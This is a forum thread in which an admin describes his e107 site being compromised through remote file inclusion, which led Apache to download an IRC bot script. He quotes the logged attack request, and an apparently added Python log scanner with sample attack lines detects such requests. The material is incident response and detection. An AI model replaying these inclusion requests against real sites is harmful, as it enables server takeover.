Apache Lounge
Forum Index -> Apache
Topic: Weird stuff happening in startup
Dutchie
Joined: 06 Jun 2010
Posts: 3
Posted: Sun 06 Jun '10 20:31    Post subject: Weird stuff happening in startup

Hi,

I hope someone can help me with this one. For some reason I noticed that my server wasn't behaving as expected. I tried to log in on my private forum but the server was unresponsive. There is also an e107 CMS running on this server.

After logging in through ssh I checked the error log and found entries indicating a GET of a script:
Code:
[Sun Jun 06 20:19:58 2010] [notice] Apache/2.2.9 (Debian) PHP/5.2.6-1+lenny8 with Suhosin-Patch configured -- resuming normal operations
[Sun Jun 06 20:19:58 2010] [info] Server built: Mar 28 2010 18:03:05
[Sun Jun 06 20:19:58 2010] [debug] prefork.c(1032): AcceptMutex: sysvsem (default: sysvsem)
--2010-06-06 20:20:02--  http://xxx.podgorz.org/xxx/shb.pl

This downloaded script (shb.pl) is written into /tmp and tries to connect to an IRC channel, but can't, since outgoing traffic is blocked by a firewall rule.

Can anyone tell me where to start looking for where this comes from?
And more importantly, how do I get this off my server?

Thanks in advance!
James Blond
Moderator
Joined: 19 Jan 2006
Posts: 7306
Location: Germany, Next to Hamburg
Posted: Mon 07 Jun '10 11:10

First you should log in to your server (ssh) and delete that file. If you can't log in to the server, ask your administrator to delete that file. You should search your logs (system log, ssh log, ftp log, and the Apache access and error logs) to see where the attacker might have broken into your system.
Maybe a Linux forum is a better place to solve your problem, since this is not Apache related but more related to your OS or the web software you use.
Dutchie
Joined: 06 Jun 2010
Posts: 3
Posted: Mon 07 Jun '10 11:31

I stopped Apache, since the fetching of the script started as soon as Apache started.

The script that was being fetched is like this one: http://pastie.org/pastes/972323

It is indeed not an Apache problem, as I found out digging through the logs, but a vulnerability in e107 in versions from before 27 May 2010.

Now the server is still hammered by Russian servers, but since the php script with the bug is removed, they can't do much.

Part of the trick they used was:
Code:
189.108.xxx.xxx - - [06/Jun/2010:21:15:10 +0400] "GET /eplugins/content/handlers/content_convert_class.php/content_convert_class.php?plugindir=http://www.tbcslough.org.uk/libraries/tcpdf/id1.txt?? HTTP/1.1" 200 - "-" "Mozilla/5.0"


Anyway, I solved it (with a reinstall of the latest version of e107), but since these kinds of attacks are platform independent I thought I would mention all the results of my findings so far.

Thanks for your quick reply, James Blond!
James Blond
Moderator
Joined: 19 Jan 2006
Posts: 7306
Location: Germany, Next to Hamburg
Posted: Mon 07 Jun '10 15:04
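A small detection script for the pattern in the access-log line quoted above, written as an added example for this thread (not code from the forum, from e107 or from fail2ban): it parses Apache combined-format lines, flags query parameters whose value is itself a remote URL (the remote file inclusion marker), and counts hits per source address, which is the kind of per-IP evidence a fail2ban jail acts on. The sample log lines, hostnames and addresses below are constructed.

```python
import re
from collections import Counter
from urllib.parse import urlsplit, parse_qsl

# Apache "combined" log line, the shape of the entry quoted in the thread.
LOG_RE = re.compile(
    r'^(?P<ip>\S+) \S+ \S+ \[(?P<ts>[^\]]+)\] '
    r'"(?P<method>\S+) (?P<target>\S+) \S+" (?P<status>\d{3}) \S+ '
    r'"[^"]*" "(?P<ua>[^"]*)"'
)
# A parameter value that is itself a URL is the classic remote-file-inclusion marker.
REMOTE_URL = re.compile(r'^(https?|ftp)://', re.IGNORECASE)

def rfi_hits(lines):
    """Return (ip, status, param, value) for requests whose query string carries
    a remote URL as a parameter value. Lines that do not parse are skipped."""
    hits = []
    for line in lines:
        m = LOG_RE.match(line)
        if not m:
            continue
        # urlsplit on a path-only target gives just the query part after the first '?'
        query = urlsplit(m.group("target")).query
        for key, value in parse_qsl(query, keep_blank_values=True):
            if REMOTE_URL.match(value):
                hits.append((m.group("ip"), int(m.group("status")), key, value))
    return hits

def repeat_offenders(lines, threshold=2):
    """Source addresses with at least `threshold` RFI attempts."""
    counts = Counter(ip for ip, _, _, _ in rfi_hits(lines))
    return {ip: n for ip, n in counts.items() if n >= threshold}

# Constructed sample (TEST-NET addresses, .invalid hostnames), not real log data.
SAMPLE_LOG = [
    '203.0.113.10 - - [06/Jun/2010:21:15:10 +0400] "GET /eplugins/content/handlers/'
    'content_convert_class.php/content_convert_class.php?plugindir=http://attacker.invalid/id1.txt?? '
    'HTTP/1.1" 200 - "-" "Mozilla/5.0"',
    '198.51.100.7 - - [06/Jun/2010:21:15:12 +0400] "GET /index.php?page=home HTTP/1.1" 200 5120 "-" "Mozilla/5.0"',
    '203.0.113.10 - - [06/Jun/2010:21:16:01 +0400] "GET /index.php?page=ftp://attacker.invalid/x.txt HTTP/1.1" 404 312 "-" "curl/7.19"',
    'garbage line that does not parse',
]

if __name__ == "__main__":
    for ip, status, key, value in rfi_hits(SAMPLE_LOG):
        print(f"{ip} -> HTTP {status}: {key}={value}")
    print("repeat offenders:", repeat_offenders(SAMPLE_LOG))
```

A 200 response to such a request, as in the quoted line, is the detail worth alerting on: the include succeeded rather than being rejected.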

Dutchie wrote:

Now the server is still hammered by Russian servers, but since the php script with the bug is removed, they can't do much.


Maybe you should think of installing fail2ban. That would reduce the hammering on Apache and save CPU usage.
Dutchie
Joined: 06 Jun 2010
Posts: 3
Posted: Wed 09 Jun '10 20:40

Thanks for the tip, I've installed a similar solution. The server is much happier now.
James Blond
Moderator
Joined: 19 Jan 2006
Posts: 7306
Location: Germany, Next to Hamburg
Posted: Thu 10 Jun '10 10:05

What did you install? I wanna know
JamesSimon
Joined: 18 Jun 2010
Posts: 1
Location: Las Vegas
Posted: Fri 18 Jun '10 9:12

So, any solution mentioned in here? Cause I can't find any..